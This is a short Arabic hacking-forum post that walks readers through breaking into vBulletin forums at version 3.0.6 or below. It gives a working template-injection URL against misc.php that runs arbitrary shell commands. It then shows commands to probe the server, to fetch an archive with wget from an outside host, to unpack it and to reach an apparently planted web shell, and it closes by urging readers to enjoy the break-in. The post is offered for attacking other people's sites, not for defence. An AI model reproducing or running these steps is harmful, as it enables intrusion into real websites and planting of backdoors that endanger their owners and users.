عرض مشاركة واحدة
 
غير متصل
 رقم المشاركة : ( 1 )
r00t l0v3r
عضو نشط
رقم العضوية : 2343
تاريخ التسجيل : 17 - 03 - 2005
الدولة :
العمر :
الجنس :
مكان الإقامة : H A C K I N G
عدد المشاركات : 55 [+]
آخر تواجد : [+]
عدد النقاط : 10
قوة الترشيح : r00t l0v3r is on a distinguished road
الأوسمـة
بيانات الإتصال
آخر المواضيع

التوقيت
Talking شرح أجدد ثغرة في منتديات vBulletin بالصور

كُتب : [ 17 - 03 - 2005 ]

بسم الله مع ثاني مشاركة أشرح لكم هذه الثغرة الخطيرة
نبدأ الشرح:::
أولا قم باختيار منتدى اصداره يكون 3.0.6 أو أقل
ثانياً ضع بعده هذا اللنك
misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=id
اذا طلع لك شاشة بيضاء يعني المنتدى غير مصاب بالثغرة أما إذا طلع لك :

فمعناه أن المنتدى مصاب بالثغرة
ثالثاً نقوم باستعراض مكاننا بالموقع بالأمر pwd فيصبح اللنك هكذا
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=pwd
يطلع لك مثل الصورة:

نقوم بوضع الأمر wget http://hkr-ksa.com/xp10/hitler.zip
فيصبح اللنك هكذا
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=wget http://hkr-ksa.com/xp10/hitler.zip
سيظهر لك شاشة بيضاء أعطيها مدة 5-10 ثواني ثم قم بوضع الأمر unzip hitler.zip فيصبح اللنك هكذا:
www.OOO.com/vb/misc.php?do=page&template={${system($_GET[cmd])}}{${exit()}}&cmd=unzip hitler.zip
ستظهر لك مثل هذه الصورة:


مبرووك الآن اخترقت المنتدى رفعت الويب أدمن
الآن ادخل إلى :
www.OOO.com/vb/khitler.php
واستمتع بالإختراق
* ملاحظة www.OOO.com/vb استبدله بعنوان الموقع
---------------------
جميع الحقوق محفوظة لـX-jAyA-X
---------------------


رد مع اقتباس